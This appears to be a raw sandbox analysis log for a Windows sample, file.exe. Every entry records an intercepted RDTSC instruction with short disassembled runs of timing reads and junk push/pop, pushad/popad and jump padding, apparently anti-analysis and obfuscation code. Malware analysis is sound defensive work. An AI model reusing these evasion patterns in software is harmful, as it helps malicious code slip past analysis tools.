Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122BED6 second address: 122BEDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122BEDA second address: 122BEE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122BEE0 second address: 122BEE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122BEE6 second address: 122BEEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122BEEC second address: 122BEF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122C04F second address: 122C060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F9668BCCCCCh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122C060 second address: 122C097 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668C559E7h 0x00000007 jp 00007F9668C559DEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop ebx 0x00000015 push edi 0x00000016 jg 00007F9668C559D6h 0x0000001c pop edi 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122C1E4 second address: 122C1F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F9668BCCCC6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122C33F second address: 122C34F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnp 00007F9668C559D6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122C4CA second address: 122C4E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007F9668BCCCC6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F9668BCCCCAh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122C4E4 second address: 122C4EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122C4EA second address: 122C4EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122C631 second address: 122C637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122C637 second address: 122C63D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122C913 second address: 122C919 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122CBFF second address: 122CC05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122CE87 second address: 122CEBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9668C559E8h 0x00000008 jmp 00007F9668C559DFh 0x0000000d jl 00007F9668C559D6h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122CEBE second address: 122CED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jg 00007F9668BCCCCEh 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122D354 second address: 122D36D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9668C559E5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122D36D second address: 122D371 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122D371 second address: 122D377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122BBB0 second address: 122BBD1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9668BCCCC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F9668BCCCD1h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122BBD1 second address: 122BBDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122BBDA second address: 122BC07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 ja 00007F9668BCCCECh 0x0000000c je 00007F9668BCCCD2h 0x00000012 push ebx 0x00000013 jmp 00007F9668BCCCCCh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EF54 second address: 122EF8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnl 00007F9668C559E7h 0x0000000b jmp 00007F9668C559E1h 0x00000010 pushad 0x00000011 jmp 00007F9668C559E8h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1231B69 second address: 1231B71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119DDDB second address: 119DDE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119DDE1 second address: 119DE1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F9668BCCCD4h 0x0000000b jmp 00007F9668BCCCCCh 0x00000010 jnp 00007F9668BCCCC6h 0x00000016 popad 0x00000017 pop ecx 0x00000018 jbe 00007F9668BCCCE4h 0x0000001e pushad 0x0000001f jbe 00007F9668BCCCC6h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119DE1E second address: 119DE27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1235808 second address: 123580D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123580D second address: 123582B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9668C559E8h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12353AB second address: 12353AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1237B70 second address: 1237B74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123772F second address: 123774E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F9668BCCCD0h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jl 00007F9668BCCCC6h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123774E second address: 1237754 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1237754 second address: 1237758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1237758 second address: 1237777 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b jmp 00007F9668C559E0h 0x00000010 pop ecx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1237777 second address: 123777D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123777D second address: 1237782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123AF92 second address: 123AFAD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F9668BCCCCEh 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123B125 second address: 123B147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 jmp 00007F9668C559E5h 0x0000000b pop edi 0x0000000c popad 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1243889 second address: 1243898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jg 00007F9668BCCCCAh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1243898 second address: 124389F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12439CD second address: 1243A21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668BCCCD7h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 jmp 00007F9668BCCCD1h 0x00000016 push ecx 0x00000017 jmp 00007F9668BCCCD7h 0x0000001c pop ecx 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1243A21 second address: 1243A3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F9668C559E5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1243A3C second address: 1243A47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F9668BCCCC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1243BA2 second address: 1243BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F5509 second address: 11F5512 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F5512 second address: 11F556F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 jl 00007F9668C559D6h 0x0000000f mov ebx, dword ptr [ebp+1248B61Fh] 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F9668C559D8h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f jmp 00007F9668C559E3h 0x00000034 add eax, ebx 0x00000036 sbb edi, 1D0B1A77h 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jnl 00007F9668C559D8h 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1244131 second address: 1244154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9668BCCCD3h 0x00000009 popad 0x0000000a pushad 0x0000000b jg 00007F9668BCCCC6h 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1244154 second address: 124415A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124415A second address: 124416D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 jmp 00007F9668BCCCCAh 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124416D second address: 1244176 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1244BA5 second address: 1244BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1244BAB second address: 1244BAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1244BAF second address: 1244BB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1244BB3 second address: 1244BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124CF31 second address: 124CF58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F9668BCCCD1h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9668BCCCCDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D266 second address: 124D27D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9668C559E1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D56D second address: 124D577 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9668BCCCC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D577 second address: 124D586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007F9668C559D6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1250A9D second address: 1250AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125119E second address: 12511A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12511A5 second address: 12511D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F9668BCCCCEh 0x00000010 pushad 0x00000011 jmp 00007F9668BCCCCCh 0x00000016 push edx 0x00000017 pop edx 0x00000018 pushad 0x00000019 popad 0x0000001a push esi 0x0000001b pop esi 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125149A second address: 125149E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125149E second address: 12514C6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9668BCCCC6h 0x00000008 jmp 00007F9668BCCCD8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12514C6 second address: 12514CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1255D52 second address: 1255D6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F9668BCCCD5h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125F1AB second address: 125F1C6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F9668C559E5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125D96A second address: 125D976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F9668BCCCC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125D976 second address: 125D988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F9668C559DCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125D988 second address: 125D996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F9668BCCCCEh 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125D996 second address: 125D99A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125D99A second address: 125D99F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125DAC6 second address: 125DAD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F9668C559DCh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125DAD7 second address: 125DADE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125DDBA second address: 125DDBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125DDBE second address: 125DDCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F9668BCCCD2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125DDCC second address: 125DDD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125DDD2 second address: 125DDD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125DDD6 second address: 125DDDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125DF1A second address: 125DF3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668BCCCD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125DF3A second address: 125DF46 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9668C559D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125DF46 second address: 125DF59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668BCCCCDh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125E8FF second address: 125E904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125E904 second address: 125E92F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 push edi 0x00000009 jmp 00007F9668BCCCD5h 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 jne 00007F9668BCCCC6h 0x0000001a pop edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125E92F second address: 125E935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125E935 second address: 125E939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125CF49 second address: 125CF7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F9668C559DCh 0x0000000f jmp 00007F9668C559E2h 0x00000014 jo 00007F9668C559D6h 0x0000001a push edi 0x0000001b pop edi 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264B94 second address: 1264B9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264B9B second address: 1264BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9668C559DBh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264566 second address: 126456A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126456A second address: 1264581 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668C559DDh 0x00000007 jnp 00007F9668C559D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12646F0 second address: 1264706 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9668BCCCD0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264874 second address: 126487C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126487C second address: 12648A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9668BCCCCBh 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007F9668BCCCCEh 0x00000014 jp 00007F9668BCCCC6h 0x0000001a popad 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
